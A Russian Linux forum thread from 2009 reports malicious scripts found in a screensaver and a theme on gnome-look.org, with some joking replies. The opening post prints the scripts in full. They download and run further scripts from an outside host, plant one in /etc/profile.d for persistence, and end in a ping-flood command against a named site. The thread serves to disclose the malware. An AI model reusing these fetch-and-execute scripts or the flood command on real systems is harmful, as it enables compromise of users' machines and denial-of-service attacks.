anonymous@RULINUX.NET~# | Last login: 2024-11-14 07:48:39 |
Регистрация Вход | Новости | Разметка | Пользователи | Галерея | Форум | Статьи | Неподтвержденное | Трекер | Правила форума | F.A.Q. | Ссылки | Поиск |
Форум - Talks | [RSS] |
Отсюда: http://community.livejournal.com/ru_linux/2385548.html
За последние несколько дней на http://gnome-look.org/ обнаружено уже 2 пакета содержащие вредоносные скрипты: скринсейвер WaterFall и тема оформления Ninja.
Скрипт: 1 #!/bin/sh 2 cd /usr/bin/ 3 rm Auto.bash 4 sleep 1 5 wget http://05748.t35.com/Bots/Auto.bash 6 chmod 777 Auto.bash 7 echo ----------------- 8 cd /etc/profile.d/ 9 rm gnome.sh 10 sleep 1 11 wget http://05748.t35.com/Bots/gnome.sh 12 chmod 777 gnome.sh 13 echo ----------------- 14 clear 15 exit
Содержание скрипта Auto.bash: 1 while : 2 do 3 rm /usr/bin/run.bash 4 cd /usr/bin/ 5 wget http://05748.t35.com/Bots/index.php 6 wget http://05748.t35.com/Bots/run.bash 7 sleep 4 8 rm index.php 9 chmod 755 run.bash 10 command -p /usr/bin/run.bash 11 done
В конечном итоге выполнялась команда: ping -s 65507 www.mmowned.com
makharadg(*) (2009-12-10 14:56:00)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.4 (build 02647) Firefox/3.5.5 (.NET CLR 3.5.30729)
|
|
|
Скрыть
Re: Вредоносные скрипты на gnome-look.org!Я давно использую kde-look для поддержание ботнета. Хомячки думают, что если линукс, то 100% защита. по сабжу: ничего страшного. У авторов явно проблемы с фантазией. Можно было сделать удаление случайных файлов в случайное время, ололо. anonymous(*)(2009-12-10 15:14:13)
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.3) Gecko/20090912 Mandriva Linux/1.9.1.3-69.1mib2009.1 (2009.1) Firefox/3.5.3 |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!>Всегда интересовал один вопрос: главную кто-нибудь читает, а?
После того, как там удалили две моих новости, желание напрочь отпало. anonymous(*)(2009-12-10 15:29:09)
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.3) Gecko/20090912 Mandriva Linux/1.9.1.3-69.1mib2009.1 (2009.1) Firefox/3.5.3 |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!> Всегда интересовал один вопрос: главную кто-нибудь читает, а?
makharadg(*)(2009-12-10 15:39:52)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.4 (build 02647) Firefox/3.5.5 (.NET CLR 3.5.30729) |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!Эх, старичье-дурачье... вот, внеси в букмарки: http://www.lor-ng.org/tracker.php gnomino(*)(2009-12-10 15:44:47)
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.5) Gecko/20091105 Fedora/3.5.5-1.fc12 Firefox/3.5.5 |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!Мда, как только не извратятся. Нет, чтобы просто написать: "If you like this theme, please ping <че-то там>" Ну да, линкусоиды извращенцы, давайте напишем скрипт для пинга... И кстати, как он работает? Он же не автоматически все это делать будет. Ясен куй его запустит какой нибудь малолетний долбойоб.
|
makharadg(*)(2009-12-10 15:52:54)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.4 (build 02647) Firefox/3.5.5 (.NET CLR 3.5.30729) |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!>Ясен куй его запустит какой нибудь малолетний долбойоб.
Повторяй это как мантру. Глядишь, скрипты из /etc/profile.d перестанут запускаться. anonymous(*)(2009-12-10 15:59:14)
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.3) Gecko/20090912 Mandriva Linux/1.9.1.3-69.1mib2009.1 (2009.1) Firefox/3.5.3 |
Скрыть
Re: Вредоносные скрипты на gnome-look.org!>Повторяй это как мантру. Глядишь, скрипты из /etc/profile.d перестанут запускаться.
Люся, ты хоть читай не сквозь пальцы. Ясно же написано, как этот скрипт запустится то сам? anonymous(*)(2009-12-10 16:19:38)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; MRSPUTNIK 2, 0, 1, 90 SW; .NET CLR 1.1.4322; InfoPath.1) |
|
|
|
Этот тред читают 2 пользователя: |
Анонимных: 2 Зарегистрированных: 0 |
Re: Вредоносные скрипты на gnome-look.org!
Мляяя, я не знаю как тут форматировать, короче смотрите по ссылке http://community.livejournal.com/ru_linux/2385548.html
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.4 (build 02647) Firefox/3.5.5 (.NET CLR 3.5.30729)